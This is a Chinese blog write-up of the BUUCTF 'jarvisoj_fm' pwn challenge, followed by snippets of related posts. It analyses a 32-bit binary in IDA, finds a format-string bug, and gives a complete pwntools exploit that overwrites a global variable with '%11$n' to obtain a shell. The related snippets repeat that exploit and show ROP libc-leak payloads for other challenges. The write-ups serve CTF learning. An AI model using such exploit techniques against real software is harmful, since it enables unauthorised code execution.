BUUCTF|pwn-jarvisoj_fm-wp

最新推荐文章于 2025-01-21 17:45:14 发布
最新推荐文章于 2025-01-21 17:45:14 发布
阅读量385 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121236676
本文探讨了一种利用格式字符串漏洞在32位程序中执行'/bin/sh'的攻击方法,通过分析main函数,定位全局变量x的位置,并构造payload利用栈溢出,最终实现代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.例行检查保护机制

 我们看到开启了堆和栈保护

2.我们用32位的IDA打开该文件

shift+f12查看关键字符串

我们看到关键字符串“/bin/sh” 

3.我们看看main函数里面有什么

我们看到如果x == 4,程序就会执行system("/bin/sh"),拿到权限

 

 这里是格式化字符串漏洞

 x是全局变量,位置在data段上:x_addr = 0x0804A02C

 

我们看看参数在栈上的位置,我们发现aaaa的位置在第十一个 

4.EXP

#encoding = utf-8
from pwn import * 
context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('fm')
	else:
		p = remote('node4.buuoj.cn',28404)
	#.data:0804A02C x
	addr = 0x0804A02C
	payload = p32(addr) + b'%11$n'
	p.sendline(payload)
	p.interactive()
main()

 

 

BUUCTFjarvisoj_fm(write up)
qq_44768749的博客
08-24 526
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 383
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF-Pwn-jarvisoj_fm
餐桌上的猫
03-25 2762
exp from pwn import* p=remote('node4.buuoj.cn',27346) x_addr=0x804A02C payload=p32(x_addr)+b'%11$n' p.sendline(payload) p.interactive()
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 471
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
buuctf jarvisoj_fm
carol2358的博客
05-04 265
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位,然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...
buuctf jarvisoj_fm
pondzhang的专栏
03-19 353
存在格式化字符串漏洞 而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值 使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1131
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 586
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 269
题目截图
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 784
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_fm
最新发布
2401_88087539的博客
01-21 254
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
jarvisoj_fmBUUCTF
qq_41696518的博客
08-31 401
jarvisoj_fmBUUCTF
[BUUCTF]PWN——jarvisoj_fm
mcmuyanga的博客
10-31 1507
jarvisoj_fm 附件 步骤: 例行检查,32位,开启了canary和nx保护 运行一下程序,看看大概的情况 32位ida载入,shift+f12检索程序里的字符串,看见了 " /bin/sh " 字符串 双击跟进,找到程序主体,当x=4的时候会执行system(/bin/sh) 第10行存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 利用x的地址配合上%11
BUUCTF 刷题 jarvisoj_fm
Helloity的博客
02-13 435
题目:BUUCTF在线评测 checksec一下,32位程序,有canary,开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下,发现一个明显的printf格式化字符串漏洞,我们需要控制x的值为4,就可以获得binsh int __cd
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 299
BUUCTF 做题练习
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 358
有canary ,题目提升fm,考虑格式化字符串。
[BUUCTF-pwn]——jarvisoj_fm
Y_peak的博客
02-22 220
[BUUCTF-pwn]—— 题目地址: https://buuoj.cn/challenges#jarvisoj_fm 点击一下writeup 在这里 以前写过所以偷懒一下, 嘿嘿嘿!!! 各位师傅不要见怪呀 ????
buuctfjarvisoj_fm】解题
qq_29317353的博客
09-04 448
一道格式化字符串的漏洞题来源buuctf
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 804
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值